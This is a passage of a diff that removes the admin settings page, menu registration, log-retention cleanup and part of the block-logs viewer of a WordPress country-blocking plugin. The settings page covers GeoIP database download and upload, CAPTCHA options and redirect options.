-        $retention_days = absint( get_option( 'advcb_log_retention_days', 30 ) );
-
-        if ( $retention_days <= 0 ) {
-                return;
-        }
-
-        global $wpdb;
-        $table_name = $wpdb->prefix . 'advcb_block_logs';
-
-        $threshold = gmdate( 'Y-m-d H:i:s', time() - ( $retention_days * DAY_IN_SECONDS ) );
-
-        $wpdb->query( $wpdb->prepare( "DELETE FROM $table_name WHERE blocked_time < %s", $threshold ) );
-}
-add_action( 'advcb_cleanup_logs_event', 'advcb_cleanup_logs' );
-
-/**
- * ADD MENU PAGE
- */
-function advcb_register_options_page() {
-	add_menu_page(
-		'Country Blocker',
-		'Country Blocker',
-		'manage_options',
-		'advcb_settings',
-		'advcb_options_page',
-		'dashicons-location-alt',
-		60
-	);
-
-	// Add a sub-page for logs.
-	add_submenu_page(
-		'advcb_settings',
-		'Block Logs',
-		'Block Logs',
-		'manage_options',
-		'advcb_block_logs',
-		'advcb_block_logs_page'
-	);
-
-	// Add a sub-page for analytics dashboard.
-	add_submenu_page(
-		'advcb_settings',
-		'Analytics Dashboard',
-		'Analytics',
-		'manage_options',
-		'advcb_analytics',
-		'advcb_analytics_dashboard_page'
-	);
-
-	// Add a sub-page for real-time activity monitor.
-	add_submenu_page(
-		'advcb_settings',
-		'Real-Time Monitor',
-		'Live Monitor',
-		'manage_options',
-		'advcb_live_monitor',
-		'advcb_live_monitor_page'
-	);
-}
-add_action( 'admin_menu', 'advcb_register_options_page' );
-
-/**
- * MAIN SETTINGS PAGE with Dynamic Country Select Boxes
- */
-function advcb_options_page() {
-	// Get current filtering mode to adjust labels.
-	$mode       = get_option( 'advcb_mode', 'allow' );
-	$list_label = ( $mode === 'block' ) ? 'Blocked Country Codes' : 'Allowed Country Codes';
-        $list_desc  = ( $mode === 'block' )
-                ? 'Select ISO country codes that should be blocked from accessing the site. Everyone else will be allowed automatically.'
-                : 'Select ISO country codes that are allowed to access the site. Visitors from all other countries will be blocked.';
-
-	// Retrieve the saved countries. Ensure we have an array.
-	$selected_countries = get_option( 'advcb_allowed_countries', array() );
-	if ( ! is_array( $selected_countries ) ) {
-		$selected_countries = explode( ',', $selected_countries );
-	}
-	// Always display at least one select box.
-	if ( empty( $selected_countries ) ) {
-		$selected_countries = array( '' );
-	}
-
-	// Get the complete list of countries.
-	$countries = advcb_get_countries();
-
-	$trusted_ips = get_option( 'advcb_trusted_ips', array() );
-	if ( is_array( $trusted_ips ) ) {
-		$trusted_ips = implode( ',', array_filter( array_map( 'trim', $trusted_ips ) ) );
-	}
-
-	$geoip_source      = get_option( 'advcb_geoip_source', 'api' );
-	$geoip_db_path     = advcb_get_geoip_database_path();
-	$geoip_db_readable = $geoip_db_path && file_exists( $geoip_db_path ) && is_readable( $geoip_db_path );
-	$geoip_storage_dir = advcb_get_geoip_storage_dir();
-
-	$block_page_title    = get_option( 'advcb_block_page_title', 'Access Restricted' );
-	$block_message       = get_option( 'advcb_block_message', 'We're sorry, but your location is not allowed to view this site.' );
-	$http_status_code    = (int) get_option( 'advcb_http_status_code', 403 );
-	$enable_redirect     = (bool) get_option( 'advcb_enable_redirect', false );
-	$redirect_url        = get_option( 'advcb_redirect_url', '' );
-	$redirect_status     = (int) get_option( 'advcb_redirect_status_code', 302 );
-	$log_retention_days  = absint( get_option( 'advcb_log_retention_days', 30 ) );
-
-	// Get current secret key for display.
-	$current_secret_key = get_option( 'advcb_secret_key', 'OpenSesame' );
-
-	// CAPTCHA settings.
-	$captcha_enabled      = get_option( 'advcb_enable_captcha', false );
-	$captcha_provider     = get_option( 'advcb_captcha_provider', 'recaptcha_v2' );
-	$captcha_site_key     = get_option( 'advcb_captcha_site_key', '' );
-	$captcha_duration     = get_option( 'advcb_captcha_duration', 24 );
-	$captcha_threshold    = get_option( 'advcb_captcha_threshold', 0.5 );
-	?>
-	<div class="wrap advcb-settings-wrap">
-		<h1><?php esc_html_e( 'Advanced Country Blocker Settings', 'advcb' ); ?></h1>
-
-		<form method="post" action="options.php" id="advcb-settings-form">
-			<?php settings_fields( 'advcb_options_group' ); ?>
-			<?php do_settings_sections( 'advcb_options_group' ); ?>
-
-			<!-- Settings Grid -->
-			<div class="advcb-settings-grid">
-
-				<!-- Country Filtering Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>🌍 <?php esc_html_e( 'Country Filtering', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label>
-								<input type="hidden" name="advcb_mode" value="allow">
-								<input type="checkbox" name="advcb_mode" value="block" <?php checked( 'block', get_option( 'advcb_mode', 'allow' ) ); ?> />
-								<span><?php esc_html_e( 'Use Blacklist Mode', 'advcb' ); ?></span>
-							</label>
-							<p class="advcb-field-description">
-								<?php esc_html_e( 'In blacklist mode, the selected countries will be blocked. In allowlist mode (default), only the selected countries can access your site.', 'advcb' ); ?>
-							</p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php echo esc_html( $list_label ); ?></label>
-							<p class="advcb-field-description"><?php echo esc_html( $list_desc ); ?></p>
-							<div id="advcb_country_selector_container">
-								<?php foreach ( $selected_countries as $country ) : ?>
-									<div class="advcb_country_selector">
-										<select name="advcb_allowed_countries[]">
-											<?php foreach ( $countries as $code => $name ) : ?>
-												<option value="<?php echo esc_attr( $code ); ?>" <?php selected( $country, $code ); ?>>
-													<?php echo esc_html( $name ); ?>
-												</option>
-											<?php endforeach; ?>
-										</select>
-										<button type="button" class="button button-small advcb_remove_country">✕</button>
-									</div>
-								<?php endforeach; ?>
-							</div>
-							<button type="button" id="advcb_add_country" class="button button-secondary">
-								+ <?php esc_html_e( 'Add Country', 'advcb' ); ?>
-							</button>
-						</div>
-					</div>
-				</div>
-
-				<!-- GeoIP Settings Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>📍 <?php esc_html_e( 'GeoIP Lookup', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Lookup Method', 'advcb' ); ?></label>
-							<select name="advcb_geoip_source" class="advcb-select">
-								<option value="api" <?php selected( $geoip_source, 'api' ); ?>><?php esc_html_e( 'Remote API (ip-api.com)', 'advcb' ); ?></option>
-								<option value="database" <?php selected( $geoip_source, 'database' ); ?>><?php esc_html_e( 'Local MaxMind Database', 'advcb' ); ?></option>
-							</select>
-							<p class="advcb-field-description">
-								<?php esc_html_e( 'Use the remote API for quick setup. Switch to local database for fully offline lookups.', 'advcb' ); ?>
-							</p>
-							<?php if ( 'database' === $geoip_source && ! $geoip_db_readable ) : ?>
-								<p class="advcb-field-warning">
-									<span class="dashicons dashicons-warning"></span>
-									<?php esc_html_e( 'Local lookup is selected but the database is not readable yet. Falling back to remote API.', 'advcb' ); ?>
-								</p>
-							<?php endif; ?>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Database Status', 'advcb' ); ?></label>
-							<?php if ( $geoip_db_readable ) : ?>
-								<div class="advcb-status advcb-status-success">
-									<span class="dashicons dashicons-yes-alt"></span>
-									<span><?php printf( esc_html__( 'Using %s', 'advcb' ), '<code>' . esc_html( basename( $geoip_db_path ) ) . '</code>' ); ?></span>
-								</div>
-								<?php
-								$db_details = array();
-								if ( $geoip_db_path ) {
-									if ( function_exists( 'size_format' ) ) {
-										$size = @filesize( $geoip_db_path );
-										if ( false !== $size ) {
-											$db_details[] = size_format( $size );
-										}
-									}
-									$modified = @filemtime( $geoip_db_path );
-									if ( $modified ) {
-										$db_details[] = esc_html__( 'updated', 'advcb' ) . ' ' . date_i18n( get_option( 'date_format' ) . ' ' . get_option( 'time_format' ), $modified );
-									}
-								}
-								if ( ! empty( $db_details ) ) {
-									echo '<p class="advcb-field-description">(' . esc_html( implode( ', ', $db_details ) ) . ')</p>';
-								}
-								?>
-							<?php else : ?>
-								<div class="advcb-status advcb-status-warning">
-									<span class="dashicons dashicons-warning"></span>
-									<?php esc_html_e( 'No readable database found. Download or upload a GeoLite2 Country .mmdb file.', 'advcb' ); ?>
-								</div>
-							<?php endif; ?>
-							<p class="advcb-field-description">
-								<?php
-								if ( $geoip_storage_dir ) {
-									printf( esc_html__( 'Databases are stored in: %s', 'advcb' ), '<code>' . esc_html( $geoip_storage_dir ) . '</code>' );
-								} else {
-									esc_html_e( 'Databases are stored in your WordPress uploads directory.', 'advcb' );
-								}
-								?>
-							</p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Download Database', 'advcb' ); ?></label>
-							<div class="advcb-button-group">
-								<button type="submit" class="button button-secondary" form="advcb-download-geoip-gitio">
-									<?php esc_html_e( 'Download from Git.io', 'advcb' ); ?>
-								</button>
-								<button type="submit" class="button button-secondary" form="advcb-download-geoip-mirror">
-									<?php esc_html_e( 'Download from Mirror', 'advcb' ); ?>
-								</button>
-							</div>
-							<div class="advcb-custom-download">
-								<input type="url" class="regular-text" id="advcb_geoip_custom_url" name="advcb_geoip_url" placeholder="https://example.com/GeoLite2-Country.mmdb" form="advcb-download-geoip-custom" />
-								<button type="submit" class="button button-primary" form="advcb-download-geoip-custom">
-									<?php esc_html_e( 'Download from URL', 'advcb' ); ?>
-								</button>
-							</div>
-						</div>
-
-						<div class="advcb-field-group">
-							<label><?php esc_html_e( 'Upload Database', 'advcb' ); ?></label>
-							<div class="advcb-upload-section">
-								<input type="file" name="advcb_geoip_file" accept=".mmdb" form="advcb-upload-geoip" />
-								<button type="submit" class="button button-primary" form="advcb-upload-geoip">
-									<?php esc_html_e( 'Upload & Use Database', 'advcb' ); ?>
-								</button>
-							</div>
-						</div>
-					</div>
-				</div>
-
-				<!-- Block Page Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>🚫 <?php esc_html_e( 'Block Page', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label for="advcb_block_page_title"><?php esc_html_e( 'Page Title', 'advcb' ); ?></label>
-							<input type="text" class="regular-text" id="advcb_block_page_title" name="advcb_block_page_title" value="<?php echo esc_attr( $block_page_title ); ?>" placeholder="<?php esc_attr_e( 'Access Restricted', 'advcb' ); ?>" />
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_block_message"><?php esc_html_e( 'Message', 'advcb' ); ?></label>
-							<textarea id="advcb_block_message" name="advcb_block_message" rows="3" class="large-text" placeholder="<?php esc_attr_e( 'We're sorry, but your location is not allowed to view this site.', 'advcb' ); ?>"><?php echo esc_textarea( $block_message ); ?></textarea>
-							<p class="advcb-field-description">
-								<?php esc_html_e( 'Available placeholders:', 'advcb' ); ?> <code>{ip}</code>, <code>{country_code}</code>, <code>{reason}</code>
-							</p>
-						</div>
-
-						<div class="advcb-field-row">
-							<div class="advcb-field-group">
-								<label for="advcb_http_status_code"><?php esc_html_e( 'HTTP Status', 'advcb' ); ?></label>
-								<select name="advcb_http_status_code" id="advcb_http_status_code" class="advcb-select">
-									<option value="403" <?php selected( $http_status_code, 403 ); ?>>403 Forbidden</option>
-									<option value="410" <?php selected( $http_status_code, 410 ); ?>>410 Gone</option>
-									<option value="451" <?php selected( $http_status_code, 451 ); ?>>451 Unavailable for Legal Reasons</option>
-								</select>
-							</div>
-						</div>
-
-						<div class="advcb-field-group advcb_enable_redirect">
-							<label>
-								<input type="checkbox" name="advcb_enable_redirect" value="1" <?php checked( $enable_redirect ); ?> />
-								<?php esc_html_e( 'Redirect blocked visitors instead of showing block page', 'advcb' ); ?>
-							</label>
-						</div>
-
-						<div class="advcb-field-group advcb-redirect-settings">
-							<label for="advcb_redirect_url"><?php esc_html_e( 'Redirect URL', 'advcb' ); ?></label>
-							<input type="url" class="regular-text" id="advcb_redirect_url" name="advcb_redirect_url" value="<?php echo esc_attr( $redirect_url ); ?>" placeholder="https://example.com/blocked" />
-						</div>
-
-						<div class="advcb-field-group advcb-redirect-settings">
-							<label for="advcb_redirect_status_code"><?php esc_html_e( 'Redirect Status', 'advcb' ); ?></label>
-							<select name="advcb_redirect_status_code" id="advcb_redirect_status_code" class="advcb-select">
-								<option value="302" <?php selected( $redirect_status, 302 ); ?>>302 Temporary Redirect</option>
-								<option value="301" <?php selected( $redirect_status, 301 ); ?>>301 Permanent Redirect</option>
-								<option value="307" <?php selected( $redirect_status, 307 ); ?>>307 Temporary Redirect</option>
-								<option value="308" <?php selected( $redirect_status, 308 ); ?>>308 Permanent Redirect</option>
-							</select>
-						</div>
-					</div>
-				</div>
-
-				<!-- Access Control Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>🔐 <?php esc_html_e( 'Access Control', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label for="advcb_secret_key"><?php esc_html_e( 'Secret Key for Temporary Access', 'advcb' ); ?></label>
-							<input type="text" class="regular-text code" id="advcb_secret_key" name="advcb_secret_key" value="<?php echo esc_attr( $current_secret_key ); ?>" placeholder="OpenSesame" />
-							<p class="advcb-field-description">
-								<?php printf( esc_html__( 'Append %s to the URL to gain temporary access.', 'advcb' ), '<code>?<span id="advcb-secret-preview">' . esc_html( $current_secret_key ) . '</span>=1</code>' ); ?>
-							</p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_blacklisted_ips"><?php esc_html_e( 'Blacklisted IP Addresses', 'advcb' ); ?></label>
-							<input type="text" id="advcb_blacklisted_ips" name="advcb_blacklisted_ips" value="<?php echo esc_attr( is_array( get_option( 'advcb_blacklisted_ips', array() ) ) ? implode( ',', get_option( 'advcb_blacklisted_ips', array() ) ) : get_option( 'advcb_blacklisted_ips', '' ) ); ?>" placeholder="1.2.3.4, 5.6.7.8" />
-							<p class="advcb-field-description"><?php esc_html_e( 'Comma-separated IPs that will be blocked regardless of country filtering.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_trusted_ips"><?php esc_html_e( 'Trusted IP Addresses', 'advcb' ); ?></label>
-							<input type="text" id="advcb_trusted_ips" name="advcb_trusted_ips" value="<?php echo esc_attr( $trusted_ips ); ?>" placeholder="1.2.3.4, 5.6.7.8" />
-							<p class="advcb-field-description"><?php esc_html_e( 'Comma-separated IPs that always bypass the blocker. Useful for uptime monitors.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-divider"></div>
-						<h3><?php esc_html_e( 'CAPTCHA Challenge', 'advcb' ); ?></h3>
-
-						<div class="advcb-field-group">
-							<label>
-								<input type="checkbox" name="advcb_enable_captcha" value="1" <?php checked( $captcha_enabled ); ?> />
-								<?php esc_html_e( 'Enable CAPTCHA Challenge', 'advcb' ); ?>
-							</label>
-							<p class="advcb-field-description"><?php esc_html_e( 'Blocked visitors can solve a CAPTCHA to gain temporary access instead of being completely blocked.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-row">
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_provider"><?php esc_html_e( 'Provider', 'advcb' ); ?></label>
-								<select name="advcb_captcha_provider" id="advcb_captcha_provider" class="advcb-select">
-									<option value="recaptcha_v2" <?php selected( 'recaptcha_v2', $captcha_provider ); ?>>reCAPTCHA v2</option>
-									<option value="recaptcha_v3" <?php selected( 'recaptcha_v3', $captcha_provider ); ?>>reCAPTCHA v3</option>
-									<option value="hcaptcha" <?php selected( 'hcaptcha', $captcha_provider ); ?>>hCaptcha</option>
-									<option value="turnstile" <?php selected( 'turnstile', $captcha_provider ); ?>>Cloudflare Turnstile</option>
-								</select>
-							</div>
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_duration"><?php esc_html_e( 'Access Duration', 'advcb' ); ?></label>
-								<input type="number" id="advcb_captcha_duration" name="advcb_captcha_duration" value="<?php echo esc_attr( $captcha_duration ); ?>" min="1" max="168" class="small-text" />
-								<span><?php esc_html_e( 'hours', 'advcb' ); ?></span>
-							</div>
-						</div>
-
-						<div class="advcb-field-row">
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_site_key"><?php esc_html_e( 'Site Key', 'advcb' ); ?></label>
-								<input type="text" id="advcb_captcha_site_key" name="advcb_captcha_site_key" value="<?php echo esc_attr( $captcha_site_key ); ?>" class="regular-text" />
-							</div>
-							<div class="advcb-field-group">
-								<label for="advcb_captcha_secret_key"><?php esc_html_e( 'Secret Key', 'advcb' ); ?></label>
-								<input type="password" id="advcb_captcha_secret_key" name="advcb_captcha_secret_key" value="<?php
-								$secret_key = get_option( 'advcb_captcha_secret_key', '' );
-								if ( isset( $_POST['advcb_captcha_secret_key'] ) && ! empty( $_POST['advcb_captcha_secret_key'] ) ) {
-									echo esc_attr( sanitize_text_field( wp_unslash( $_POST['advcb_captcha_secret_key'] ) ) );
-								} elseif ( ! empty( $secret_key ) ) {
-									echo '••••••••••••••••';
-								}
-								?>" autocomplete="off" class="regular-text" />
-							</div>
-						</div>
-
-						<div class="advcb-field-group advcb-recaptcha-v3-setting" style="display: none;">
-							<label for="advcb_captcha_threshold"><?php esc_html_e( 'reCAPTCHA v3 Threshold', 'advcb' ); ?></label>
-							<input type="number" id="advcb_captcha_threshold" name="advcb_captcha_threshold" value="<?php echo esc_attr( $captcha_threshold ); ?>" min="0" max="1" step="0.1" class="small-text" />
-							<p class="advcb-field-description"><?php esc_html_e( 'Score threshold (0.0 - 1.0). Lower is stricter.', 'advcb' ); ?></p>
-						</div>
-					</div>
-				</div>
-
-				<!-- Logging & Alerts Card -->
-				<div class="advcb-settings-card">
-					<div class="advcb-card-header">
-						<h2>📊 <?php esc_html_e( 'Logging & Alerts', 'advcb' ); ?></h2>
-					</div>
-					<div class="advcb-card-content">
-						<div class="advcb-field-group">
-							<label>
-								<input type="checkbox" name="advcb_enable_logs" value="1" <?php checked( true, (bool) get_option( 'advcb_enable_logs', true ) ); ?> />
-								<?php esc_html_e( 'Enable Logging', 'advcb' ); ?>
-							</label>
-							<p class="advcb-field-description"><?php esc_html_e( 'Keep a record of blocked attempts in the database.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_log_retention_days"><?php esc_html_e( 'Log Retention', 'advcb' ); ?></label>
-							<input type="number" id="advcb_log_retention_days" name="advcb_log_retention_days" value="<?php echo esc_attr( $log_retention_days ); ?>" min="0" class="small-text" />
-							<span><?php esc_html_e( 'days', 'advcb' ); ?></span>
-							<p class="advcb-field-description"><?php esc_html_e( 'Entries older than this will be automatically deleted. Use 0 to keep logs forever.', 'advcb' ); ?></p>
-						</div>
-
-						<div class="advcb-field-divider"></div>
-
-						<div class="advcb-field-group">
-							<label>
-								<input type="checkbox" name="advcb_send_email_alerts" value="1" <?php checked( true, (bool) get_option( 'advcb_send_email_alerts', false ) ); ?> />
-								<?php esc_html_e( 'Enable Email Alerts', 'advcb' ); ?>
-							</label>
-						</div>
-
-						<div class="advcb-field-group">
-							<label for="advcb_alert_email"><?php esc_html_e( 'Alert Email Address', 'advcb' ); ?></label>
-							<input type="email" id="advcb_alert_email" name="advcb_alert_email" value="<?php echo esc_attr( get_option( 'advcb_alert_email', get_option( 'admin_email' ) ) ); ?>" class="regular-text" />
-						</div>
-					</div>
-				</div>
-
-			</div>
-
-			<!-- Save Button -->
-			<div class="advcb-save-section">
-				<?php submit_button( null, 'primary', 'submit', true, array( 'id' => 'advcb-save-button' ) ); ?>
-			</div>
-		</form>
-
-		<!-- Hidden Forms for GeoIP Operations -->
-		<form id="advcb-download-geoip-gitio" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_download' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_download" />
-			<input type="hidden" name="advcb_geoip_url" value="https://git.io/GeoLite2-Country.mmdb" />
-		</form>
-		<form id="advcb-download-geoip-mirror" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_download' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_download" />
-			<input type="hidden" name="advcb_geoip_url" value="https://github.com/P3TERX/GeoLite.mmdb/raw/download/GeoLite2-Country.mmdb" />
-		</form>
-		<form id="advcb-download-geoip-custom" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_download' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_download" />
-		</form>
-		<form id="advcb-upload-geoip" class="advcb-hidden-form" method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" enctype="multipart/form-data" style="display:none;" aria-hidden="true">
-			<?php wp_nonce_field( 'advcb_geoip_upload' ); ?>
-			<input type="hidden" name="action" value="advcb_geoip_upload" />
-		</form>
-	</div>
-
-	<!-- Inline JavaScript -->
-	<script>
-	jQuery(document).ready(function($) {
-		// Add new select box when "Add Country" is clicked.
-		$('#advcb_add_country').on('click', function(){
-			var $clone = $('#advcb_country_selector_container .advcb_country_selector:first').clone();
-			$clone.find('select').val('');
-			$('#advcb_country_selector_container').append($clone);
-		});
-
-		// Remove a select box when its remove button is clicked.
-		$(document).on('click', '.advcb_remove_country', function(){
-			if ($('#advcb_country_selector_container .advcb_country_selector').length > 1) {
-				$(this).closest('.advcb_country_selector').remove();
-			} else {
-				alert('<?php esc_html_e( 'At least one country must be selected.', 'advcb' ); ?>');
-			}
-		});
-
-		// Update secret key preview on input change.
-		$('#advcb_secret_key').on('input', function() {
-			$('#advcb-secret-preview').text($(this).val() || 'OpenSesame');
-		});
-
-		// Show/hide reCAPTCHA v3 threshold and redirect settings.
-		function toggleDynamicSettings() {
-			var provider = $('select[name="advcb_captcha_provider"]').val();
-			if (provider === 'recaptcha_v3') {
-				$('.advcb-recaptcha-v3-setting').show();
-			} else {
-				$('.advcb-recaptcha-v3-setting').hide();
-			}
-
-			var redirectEnabled = $('input[name="advcb_enable_redirect"]').prop('checked');
-			if (redirectEnabled) {
-				$('.advcb-redirect-settings').show();
-			} else {
-				$('.advcb-redirect-settings').hide();
-			}
-		}
-
-		// Run on page load and when settings change.
-		toggleDynamicSettings();
-		$('select[name="advcb_captcha_provider"]').on('change', toggleDynamicSettings);
-		$('input[name="advcb_enable_redirect"]').on('change', toggleDynamicSettings);
-	});
-	</script>
-
-	<style>
-		.advcb-settings-wrap {
-			max-width: 1400px;
-		}
-
-		.advcb-settings-grid {
-			display: grid;
-			grid-template-columns: repeat(auto-fill, minmax(450px, 1fr));
-			gap: 20px;
-			margin: 20px 0;
-		}
-
-		.advcb-settings-card {
-			background: #fff;
-			border: 1px solid #c3c4c7;
-			border-radius: 8px;
-			overflow: hidden;
-			box-shadow: 0 1px 3px rgba(0,0,0,0.05);
-		}
-
-		.advcb-card-header {
-			padding: 15px 20px;
-			background: #f6f7f7;
-			border-bottom: 1px solid #c3c4c7;
-		}
-
-		.advcb-card-header h2 {
-			margin: 0;
-			font-size: 1.1em;
-			color: #1d2327;
-			display: flex;
-			align-items: center;
-			gap: 8px;
-		}
-
-		.advcb-card-content {
-			padding: 20px;
-		}
-
-		.advcb-card-content > h3 {
-			margin-top: 0;
-			padding-top: 15px;
-			font-size: 1em;
-			color: #1d2327;
-			border-top: 1px solid #eee;
-		}
-
-		.advcb-field-group {
-			margin-bottom: 18px;
-		}
-
-		.advcb-field-group:last-child {
-			margin-bottom: 0;
-		}
-
-		.advcb-field-group label {
-			display: block;
-			font-weight: 600;
-			margin-bottom: 6px;
-			color: #1d2327;
-		}
-
-		.advcb-field-group input[type="text"],
-		.advcb-field-group input[type="url"],
-		.advcb-field-group input[type="email"],
-		.advcb-field-group input[type="number"],
-		.advcb-field-group input[type="password"],
-		.advcb-field-group select,
-		.advcb-field-group textarea {
-			width: 100%;
-			max-width: 400px;
-		}
-
-		.advcb-field-group input.code {
-			font-family: Monaco, Consolas, monospace;
-		}
-
-		.advcb-field-group input.small-text {
-			width: 80px;
-		}
-
-		.advcb-field-description {
-			margin: 6px 0 0;
-			font-size: 13px;
-			color: #646970;
-			line-height: 1.4;
-		}
-
-		.advcb-field-description code {
-			background: #f0f0f1;
-			padding: 2px 6px;
-			border-radius: 3px;
-			font-size: 12px;
-		}
-
-		.advcb-field-warning {
-			margin: 8px 0 0;
-			padding: 8px 12px;
-			background: #fff8e5;
-			border-left: 3px solid #dba617;
-			color: #646970;
-			font-size: 13px;
-			display: flex;
-			align-items: center;
-			gap: 8px;
-		}
-
-		.advcb-field-warning .dashicons {
-			color: #dba617;
-		}
-
-		.advcb-field-row {
-			display: grid;
-			grid-template-columns: 1fr 1fr;
-			gap: 15px;
-		}
-
-		.advcb-field-divider {
-			height: 1px;
-			background: #eee;
-			margin: 20px 0;
-		}
-
-		.advcb-status {
-			display: inline-flex;
-			align-items: center;
-			gap: 8px;
-			padding: 6px 12px;
-			border-radius: 4px;
-			font-size: 13px;
-		}
-
-		.advcb-status-success {
-			background: #edfaef;
-			color: #00a32a;
-		}
-
-		.advcb-status-success .dashicons {
-			color: #00a32a;
-		}
-
-		.advcb-status-warning {
-			background: #fff8e5;
-			color: #dba617;
-		}
-
-		.advcb-button-group {
-			display: flex;
-			gap: 10px;
-			flex-wrap: wrap;
-		}
-
-		.advcb-custom-download {
-			display: flex;
-			gap: 10px;
-			margin-top: 10px;
-		}
-
-		.advcb-upload-section {
-			display: flex;
-			flex-direction: column;
-			gap: 10px;
-		}
-
-		.advcb-upload-section input[type="file"] {
-			max-width: 300px;
-		}
-
-		.advcb_country_selector {
-			display: flex;
-			gap: 8px;
-			margin-bottom: 8px;
-		}
-
-		.advcb_country_selector select {
-			flex: 1;
-			max-width: none;
-		}
-
-        .advcb_enable_redirect {
-            margin-top: 10px;
-        }
-
-		/* Responsive */
-		@media (max-width: 1200px) {
-			.advcb-settings-grid {
-				grid-template-columns: 1fr;
-			}
-		}
-
-		@media (max-width: 600px) {
-			.advcb-field-row {
-				grid-template-columns: 1fr;
-			}
-
-			.advcb-button-group {
-				flex-direction: column;
-			}
-
-			.advcb-custom-download {
-				flex-direction: column;
-			}
-		}
-	</style>
-	<?php
-}
-
-/**
- * SHOW THE BLOCK LOGS IN THE ADMIN
- */
-function advcb_block_logs_page() {
-        global $wpdb;
-        $table_name = $wpdb->prefix . 'advcb_block_logs';
-
-        advcb_cleanup_logs();
-
-        // Check for a truncate action and validate nonce.
-        if ( isset( $_GET['action'] ) && $_GET['action'] === 'truncate_logs' && isset( $_GET['_wpnonce'] ) && wp_verify_nonce( $_GET['_wpnonce'], 'truncate_logs' ) ) {
-                $wpdb->query( "TRUNCATE TABLE $table_name" );
-                echo '<div class="updated notice"><p>Logs have been cleared.</p></div>';
-	}
-
-	$paged  = isset( $_GET['paged'] ) ? absint( $_GET['paged'] ) : 1;
-	$limit  = 20;
-	$offset = ( $paged - 1 ) * $limit;
-
-	$results = $wpdb->get_results( $wpdb->prepare(
-		"SELECT * FROM $table_name ORDER BY blocked_time DESC LIMIT %d OFFSET %d",
-		$limit,
-		$offset
-	) );
-
-	$total       = $wpdb->get_var( "SELECT COUNT(*) FROM $table_name" );
-	$total_pages = ceil( $total / $limit );
-        ?>
-    <div class="wrap">
-        <h1>Blocked Attempts Log</h1>
-        <p class="description">
-            <?php
-            $retention_days = absint( get_option( 'advcb_log_retention_days', 30 ) );
-            if ( $retention_days > 0 ) {
-                    printf( esc_html__( 'Entries older than %d day(s) are removed automatically.', 'advcb' ), $retention_days );
-            } else {
-                    esc_html_e( 'Automatic log cleanup is currently disabled.', 'advcb' );
-            }
-            ?>
-        </p>
-        <!-- Add a Clear Logs button -->
-        <p>
-            <a href="<?php echo esc_url( add_query_arg( array(
-                                'action'   => 'truncate_logs',
-                                '_wpnonce' => wp_create_nonce( 'truncate_logs' )
-			) ) ); ?>" class="button button-secondary" onclick="return confirm('Are you sure you want to clear all logs?');">
-                Clear Logs
-            </a>
-        </p>
-		<?php if ( $results ) : ?>
-            <table class="widefat fixed striped">
-                <thead>
-                <tr>
-                    <th width="50px">ID</th>
-                    <th width="150px">IP</th>
-                    <th width="100px">Country Code</th>
-                    <th>Reason</th>
-                    <th width="200px">Time</th>
-                </tr>
-                </thead>
-                <tbody>
-				<?php foreach ( $results as $row ) : ?>
-                    <tr>
-                        <td><?php echo esc_html( $row->id ); ?></td>
-                        <td><?php echo esc_html( $row->ip ); ?></td>
-                        <td><?php echo esc_html( $row->country_code ); ?></td>
-                        <td><?php echo esc_html( $row->reason ); ?></td>
-                        <td><?php echo esc_html( $row->blocked_time ); ?></td>
-                    </tr>
-				<?php endforeach; ?>
-                </tbody>
-            </table>
-			<?php if ( $total_pages > 1 ) : ?>
-                <div class="tablenav">
-                    <div class="tablenav-pages">
-						<?php
-						// Limit pagination to a maximum of 10 buttons.
-						if ( $total_pages > 10 ) {
-							if ( $paged <= 6 ) {
-								$start = 1;
-								$end   = 10;
-							} elseif ( $paged > $total_pages - 5 ) {
-								$start = $total_pages - 9;
-								$end   = $total_pages;
-							} else {
-								$start = $paged - 5;
-								$end   = $paged + 4;
-							}
-						} else {
-							$start = 1;
-							$end   = $total_pages;
-						}
-
-						// Optionally, add a "Previous" button.
-						if ( $paged > 1 ) {
-							echo '<a class="button" href="' . esc_url( add_query_arg( array( 'page' => 'advcb_block_logs', 'paged' => $paged - 1 ) ) ) . '">« Prev</a> ';
-						}
-
-						for ( $i = $start; $i <= $end; $i++ ) {
-							$class = ( $i == $paged ) ? ' class="button button-primary disabled"' : ' class="button"';
